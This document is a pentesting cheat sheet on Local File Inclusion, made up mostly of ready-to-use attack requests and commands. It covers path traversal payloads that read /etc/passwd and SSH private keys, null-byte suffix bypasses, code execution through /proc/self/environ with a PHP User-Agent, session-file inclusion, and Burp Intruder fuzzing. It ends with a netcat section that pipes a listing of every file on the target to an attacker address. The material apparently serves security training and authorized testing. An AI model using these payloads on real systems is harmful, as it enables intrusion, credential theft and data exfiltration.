# Local File Inclusion (LFI)

## Local File Inclusion

* If your path looks like a file/folder.. you might find an LFI
* Keep trying combinations until you find one.
* Or google/searchsploit a known LFI
* REF: [PhpTricks](https://pentest.mxhx.org/04-webapps/php-tricks), [WebInjections](https://pentest.mxhx.org/04-webapps/03-webapp), [PFSenseRemoteExec](https://pentest.mxhx.org/pfsense#exec-code-exploit), [CharEvasion](https://pentest.mxhx.org/03-getting-in/char-evasion-tricks)

```
LFI Likely:
http://$IP/dept/manage.php?notes=files/nineveh.txt

Testing:
http://$IP/dept/manage.php?notes=files/../../../../etc/passwd
http://$IP/dept/manage.php?notes=files/../../../../../../../etc/passwd
http://$IP/dept/manage.php?notes=/myNotes/../../../etc/passwd
```

## Automation

* Automate LFI Enumeration/Discovery.
* Good to add to the tool-belt when you're looking to see what sensitive files exists and are readable once you've found a LFI vulnerability. It also includes a Mode (ICE-Breaker) to scan a potential target using an encoded path traversal list - which helps in LFI discovery.
* <https://www.reddit.com/r/oscp/comments/9fxhbp/helpful_local_file_inclusion_tool_fi/>

```
nikto ..might give you one (if known)
python fi-cyberscan.py -t http://$IP/cyber.php?page= -m1
fimap -u $IP  ..in kali
```

## Whoami Home SSH:

```
whoami:
/proc/self/status  ..match 100:101 with /etc/passwd

Home directory:
/etc/passwd                    ..learn home path
/var/lib/asterisk/             ..check home path
/var/lib/asterisk/.ssh/id_rsa  ..priv ssh key here?
```

## Code exe with 'environ'

* If you have access to 'environ' - you might have code execution
* Burp > Repeater > /proc/self/environ

```
graph.php?lang=../../../proc/self/environ%00&module=Accounts
User-Agent: <?php echo "hello"; ?>
Go
```

## Fuzzing LFI

* Burp > Intercept > Send to **Intruder** > Positions
* Clear & Add: $attack$
* <https://github.com/tennc/fuzzdb/tree/master/dict/BURP-PayLoad/LFI>
* REF: [Fuzzing](https://pentest.mxhx.org/02-scanning/fuzzing)

```
graph.php?lang=../../../etc/passwd%00&module=Accounts
graph.php?lang=../../../$attack$%00&module=Accounts
                           |
                         Keyword for fuzz

Payloads > Load > burp-fuzz > 
LFI-LogFileCheck.txt
LFI-InterstingFiles.txt

Start Attack
Sort by Length ..to see results
```

## RFI from LFI (php cookies)

* If you can locate the 'session' cookies
* You may be able to inject them into **Burp Repeater** to get an Execution

```
cd vtiger/  ..if you have the source
grep -R phpinfo\(\)  
maybe: Image/Canvas/PDF.php  ..if we can access?
Find where session is saved:
ex: /tmp/sess_xyz123

Repeater:
graph.php?lang=../../../tmp/sess_xyz123%00&module=Accounts
Might give you execution
```

## Directory Traversals

```
--------------------
--------------------
/images/./photo.jpg             .. ok
/images/../photo.jpg            .. error
/images/../images/photo.jpg     .. win!

http://abc.so/images/../photo.png                              ..ok
http://abc.so/images/../../../../../photo.png                  ..ok
http://abc.so/../../../../../../../../../../secret.key         ..nothing

http://abc.so/file.php?file=photo.png
http://abc.so/file.php?file=./photo.png                  .. added ./
http://abc.so/file.php?file=./file.php                   .. 'real' file.php
http://abc.so/file.php?file=./../../../../../etc/passwd  .. worked !!
http://abc.so/file.php?file=./../../../../../boot.ini    .. windows target !!


--------------------
--------------------
Filtered: Cant leave /var/www/ 

http://abc.so/
http://abc.so/file.php?file=/var/www/photo.png                           ..ok
http://abc.so/file.php?file=/secret.key                                  ..fail
http://abc.so/file.php?file=./../../../../../../../../photo.png          ..fail
http://abc.so/file.php?file=/var/www/file.php                            ..ok
http://abc.so/file.php?file=/var/www/../../../../../../../../etc/passwd  ..ok
```

## NULL BYTE

* %00 ..URL-encoded
* Adding a NULL BYTE will get rid of suffix (on older systems)
* Works well in Perl and older versions of PHP (solved since 5.3.4)
* Scenario: Server is adding .png automatically to your page

```
http://abc.so/file.php?file=photo                 .. ok
http://abc.so/file.php?file=photo.png             .. nothing
http://abc.so/file.php?file=photo.png%00          .. ok
http://abc.so/file.php?file=file.php%00           .. ok
http://abc.so/file.php?file=/../../etc/passwd%00  .. win
```

## Netcat Tricks

* Find all files on host.. send to remote
* REF: [ReverseShell](https://pentest.mxhx.org/03-getting-in/03-reverseshell-php#nc), [CharEvasion](https://pentest.mxhx.org/03-getting-in/char-evasion-tricks), [LFI](https://pentest.mxhx.org/04-webapps/lfi)

```
target: 
echo+abc+|nc+10.x.x.x:9000    ..test
find+/+|nc+10.x.x.x:9000      ..pull all files

kali:
nc -nvlp 9000 > findall.txt   ..receive
```